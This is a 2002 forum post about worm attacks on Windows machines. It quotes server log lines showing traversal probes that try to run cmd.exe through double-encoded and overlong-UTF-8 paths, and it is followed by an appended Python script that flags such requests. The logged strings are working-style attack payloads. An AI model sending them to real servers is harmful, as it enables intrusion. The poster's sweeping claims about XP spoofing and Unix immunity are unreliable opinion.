Politics : PRESIDENT GEORGE W. BUSH

To: David Lawrence who wrote (313629)
From: Thomas A Watson
Date: 11/2/2002 11:29:33 AM
 
Easily; no, that is not true in the case of these attacks. One can use any computer one controls to launch attacks. These attacks are coming from computers infected with a virus and are attacking, most likely without the knowledge of the owner. MSFT OSes have been found to be infected with relative ease from many different entrances.

I would like for anyone to provide me with the names of some Unix or Linux viruses.

With XP there is a new wrinkle. XP has IP spoofing built in and thus is less detectable should it become the source of an attack, and can switch IPs to get around IP lockouts.

My advice to anyone with DSL or a cable modem: even if you only have a single computer, connect to your cable/DSL modem through a Linksys or some other cable router.

Yesterday's attack: I think this is some of the signature of the Code Red virus.
234.200.252.64.snet.net - - [31/Oct/2002:18:44:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283
.......

This morning's attack....
64.119.99.222 - - [02/Nov/2002:03:39:55 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283
64.119.99.222 - - [02/Nov/2002:03:39:55 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
64.119.99.222 - - [02/Nov/2002:03:39:57 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
64.119.99.222 - - [02/Nov/2002:03:39:57 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
64.119.99.222 - - [02/Nov/2002:03:39:57 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
64.119.99.222 - - [02/Nov/2002:03:40:04 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
64.119.99.222 - - [02/Nov/2002:03:40:04 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
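An added example, not part of the original post: one way to flag requests like those in the log above from the defender's side, by percent-decoding the path in layers and checking for double encoding, overlong UTF-8 bytes, `..` segments and requests for `cmd.exe`/`root.exe`. The function names and reason labels are hypothetical, and the last sample line (from 192.0.2.10) is constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache common log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+$')

# First five lines are copied from the post; the last is a constructed benign request.
SAMPLE = '''\
64.119.99.222 - - [02/Nov/2002:03:39:55 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283
64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
64.119.99.222 - - [02/Nov/2002:03:40:04 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
192.0.2.10 - - [02/Nov/2002:03:41:00 -0500] "GET /index.html HTTP/1.0" 200 1024
'''.splitlines()

def decode_layers(path, max_rounds=3):
    """Percent-decode repeatedly; return (final bytes, rounds that changed the data)."""
    data, rounds = path.encode("latin-1"), 0
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(line):
    """Return (host, sorted reasons) for one log line; no reasons means nothing matched."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None, ["unparsed"]
    host, target = m.groups()
    raw, rounds = decode_layers(target.split("?", 1)[0])  # inspect the path, not the query
    reasons = set()
    if rounds > 1:                          # e.g. %255c -> %5c -> backslash
        reasons.add("multi-encoded")
    if b"\xc0" in raw or b"\xc1" in raw:    # 0xC0/0xC1 never begin a valid UTF-8 sequence
        reasons.add("overlong-utf8")
    if b".." in raw.replace(b"\\", b"/").split(b"/"):
        reasons.add("traversal")
    if raw.lower().endswith((b"/cmd.exe", b"/root.exe")):
        reasons.add("shell-binary")
    return host, sorted(reasons)

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry))
```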